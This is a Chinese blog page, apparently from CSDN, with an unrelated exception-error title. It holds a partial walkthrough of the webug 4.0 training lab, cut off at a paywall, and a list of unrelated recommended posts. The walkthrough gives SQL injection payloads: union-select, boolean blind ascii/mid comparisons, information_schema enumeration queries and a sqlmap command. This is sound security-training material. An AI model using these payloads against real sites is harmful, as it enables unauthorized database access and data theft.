argumentoutofrangeexception:长度不能小于0_webug4.0通关记录

最新推荐文章于 2021-04-04 09:27:40 发布
VIP文章 最新推荐文章于 2021-04-04 09:27:40 发布
阅读量544 收藏 1
点赞数
文章标签: argumentoutofrangeexception:长度不能小于0
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31366207/article/details/112128890
版权

webug4.0靶场,里面有30关,内含常见的web安全漏洞

0x01 报错注入

字符型注入,没啥好说的很简单4c3f33ac0d540e174ddd059da5b3c2f3.png

然后id=1'union select 1,user() --+

也可以用sqlmap跑:sqlmap -u "URL地址" --cookie="cookie" --batch --dbs

当然id=1 and 1=1也可以

0x02 布尔盲注

在页面输入任何无效字符时都不会报错显示出来,这时就得利用盲注一个一个字符去猜了

  1. 当加单引号时页面并没有报错提示,但是你如果仔细观察的话就会发现与正常页面比较少了一行字

  • 输入错误时283ae1f20b1ea6163e5fc893c5cfe3e9.png

  • 正常页面时4c086cc6c08a234fc53e5c7bab309d5f.png

  1. 接下来就是猜数据库名了,有两种方式(其实原理都一样),由第一关得知数据库名为:webug

  • 第一种:当数据库名长度大于所比较的数时回显点1也就是tuer,当比较的数大于数据库名长度时此回显位置会显示0也就是false8b9a22e1bf9c4d2f75cc88e566dd740b.png

  • 第二种:当数据库名长度大于所比较的数时页面正常(这行字还在),因为webug长度为52c5ca082ef5352f5136d575161c2957f.png

  • 当数据库名长度小于所比较的数时,这行字就会消失,以此来判断ac0cce99c3a80556725f913b8ed4e814.png

  1. 长度有了接下来就是判断数据库名了,这里使用ascii进行比较(可先查阅ascii表)

猜第一个字符:id=1' and ascii(mid(database(),1,1))>1--+
猜第二个字符:id=1' and ascii(mid(database(),2,1))>1--+
以此类推...(先麻烦可以使用burp跑一下或者sqlmap一把梭)

  1. 查询表
#查第一个表的长度
id=1' and (select length(table_name)from information_schema.tables where tables_schema=database()limit 0,1)>10--+

#查询表的第一个字符;
id=1' and ascii(mid((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))>1
以此类推...
  1. 查字段
#查指定表中的字段
and(select count(column_name)from information_schema.columns where table_name = '表名' and table_schema = database())>2

#查询字段第一个字符;
id=1' and ascii(mid((select column_name from information_schema.columns where table_schema = 'xxx字段名' and TABLE_NAME ='表名' limit 0,1),1,1))>105
  1. 查询字段行数;
#查询字段所有行数
id=1' and (select count(*) from 字段.表)>4

#查询字段名行数
id=1' and (select count(uname)from 字段.表)>7
  1. 查询字段内容
length((select username from 字段.users limit 0,1))>10ascii(mi
最低0.47元/天 解锁文章
致无邪
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
指定的参数已超出有效值的范围参数名: utcDate
08-10
异常详细信息: System.ArgumentOutOfRangeException: 指定的参数已超出有效值的范围。 参数名: utcDate 源错误: 执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和...
Vue循环
⁣  ⁡⁣⁣
11-26 1454
v-for 语法 site in sites, sites 是源数据数组 site 是数组元素迭代的别名。 示例 <body> <div id="app"> <ol> <li v-for="site in sites"> {{ site.name }} </li> </ol> </div>
argumentoutofrangeexception:长度不能小于0_(Medium)Leetcode每日一题6.28长度最小的子数组...
weixin_30564447的博客
12-10 136
点击上方“蓝字”关注我(Medium)长度最小的子数组原题地址给定一个含有 n 个正整数的数组和一个正整数 s ,找出该数组中满足其和 ≥ s 的长度最小的连续子数组,并返回其长度。如果不存在符合条件的连续子数组,返回 0。示例:输入: s = 7, nums = [2,3,1,2,4,3]输出: 2解释: 子数组 [4,3] 是该条件下的长度最小的连续子数组。进阶:如果你已经完成了O(...
【YMGJ 4】APP-----长度不能小于 0
何新生(Daniel) 勇敢坚毅真正之才智乃刚毅之志向。 —— 拿破仑
07-16 1482
System.ArgumentOutOfRangeException: 长度不能小于 0                                                                                                                             ----------【YMGJ】艺萌管家
argumentoutofrangeexception:长度不能小于0_钢筋绑扎搭接长度都不知道,你都不好意思说你是做工程的...
weixin_33784667的博客
12-24 207
钢筋绑扎搭接的机理是钢筋的锚固,认为两段钢筋各自都锚固在砼里了就视同连续的一根样。然而,因为搭接段钢筋相互接触,接触面缺少足够的砼包裹,缺失一部分握裹力。科研人员考虑到这点,经过研究和实践,在规范应用时,引入了一个大于一的修正系数乘以锚固长度予以补偿,作为绑扎搭接的长度。所以,绑扎搭接长 =锚固长度×修正系数。我们知道,11G101-1里的钢筋搭接是要我们去计算的,应该说还是有点小麻烦的,而新版的...
argumentoutofrangeexception:长度不能小于0_家装防水究竟能不能自己动手做?你想知道的全在这!...
weixin_36160225的博客
12-26 97
现在,越来越多人意识到防水工程的重要性。一些喜欢自己动手施工的业主就选择了自己做防水。最近就有很多人问小编,卫生间怎么做防水?厨房防水怎么做?(图片来源于网络)在此建议,最好不要自己做防水,因为防水工艺要求比较高,没有专业的指导很容易导致自己做的防水质量不过关。有些人为了节省一些装修的开支而选择自己做,但可能会花费大量的时间和精力在上面,这是得不偿失的。雨虹防水的系统防水服务,就可以为你提供卫生间...
正则一则 将金额转换成人民币大写的代码
01-02
0) throw new ArgumentOutOfRangeException(“参数money不能为负值!”); string s = money.ToString(“#L#E#D#C#K#E#D#C#J#E#D#C#I#E#D#C#H#E#D#C#G#E#D#C#F#E#D#C#.0B0A”); s = Regex.Replace(s, @”((?<=-|^...
DropDownList绑定选择数据报错提示异常解决方案
01-02
抛出的异常信息:异常详细信息: System.ArgumentOutOfRangeException: “ddlTotalCostDiscount ”有一个无效 SelectedValue,因为它不在项目列表中。 原先给DropDownList这样赋值: this.ddlTotalCostDiscount....
C#中利用正则表达式将人民币金额转换为大写汉字
01-05
throw new ArgumentOutOfRangeException(参数money不能为负值!); string s = money.ToString(#L#E#D#C#K#E#D#C#J#E#D#C#I#E#D#C#H#E#D#C#G#E#D#C#F#E#D#C#.0B0A); s = Regex.Replace(s, @((?<=-|^)[^1-9]*)|...
XPTable(修改后源码和dll)
03-16
解决问题:否则在某些情况下(任意调整窗口大小,XPTable的Anchor设置为随窗口大小自适应调整)会抛System.ArgumentOutOfRangeException异常,vScrollBar.LargeChange不能小于0 2、...\Models\Table.cs Line 5598,...
argumentoutofrangeexception:长度不能小于0_Redis5.0源码解析4 - 列表
weixin_34961316的博客
12-28 156
Redis为列表结构提供了多种不同的实现,分为AdList、ZipList和QuickList三种。主要的代码在adlist.h、adlist.c、ziplist.h、ziplist.c、quicklist.h、quicklist.c和t_list.c这几个文件中。其中用户使用的lpush、rpush、llen、lrange、ltrim等list相关的命令都是用QuickList数据结构实现的。1...
webug 4.0通关
SwBack的博客
04-04 981
去年写的,写完就忘记了。第二关到第五关记得当时嫌麻烦没搞。。凑合看吧推下导航页面,极客导航 | 用爱发电第一关 显错注入打开页面,猜测URL是注入点,单引号测试,成功报错。查询字段长度1'order by 2--+ 回显正常1'order by 3--+ 报错 字段长度为2 查询数据库名,可以看到,只有第二个字段有输出。如此使用group_concat()进行查询。1'union select 1...
node-v18.18.2-headers.tar.xz
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
node-v7.7.3-headers.tar.xz
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
使用C#,生成特定格式Word文档
05-20
Word文档的自动化生成,可以根据数据自动形成文档
JavaScript_简单的动画为您的顺风项目.zip
05-20
JavaScript
node-v10.10.0-headers.tar.gz
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
UE 剔除透视材质-材质函数(可编辑)
05-20
在虚幻引擎中,当我们向透过外壳看到内部的材质,或者透过布料/盔甲等看到人体,即可通过将该材质函数连接到相应的材质节点图中,达到这样的效果。
node-v16.17.1-headers.tar.xz
最新发布
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
System.ArgumentOutOfRangeException: 索引超出范围。必须为非负值并小于集合大小。
06-09
解决这个异常的方法是检查访问集合元素的索引是否越界,确保索引值在集合索引的有效范围内,并且不能为负数。 例如,如果你要访问一个长度为 n 的数组的第 n 个元素,就会发生这个异常,因为数组的索引是从 0 开始...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值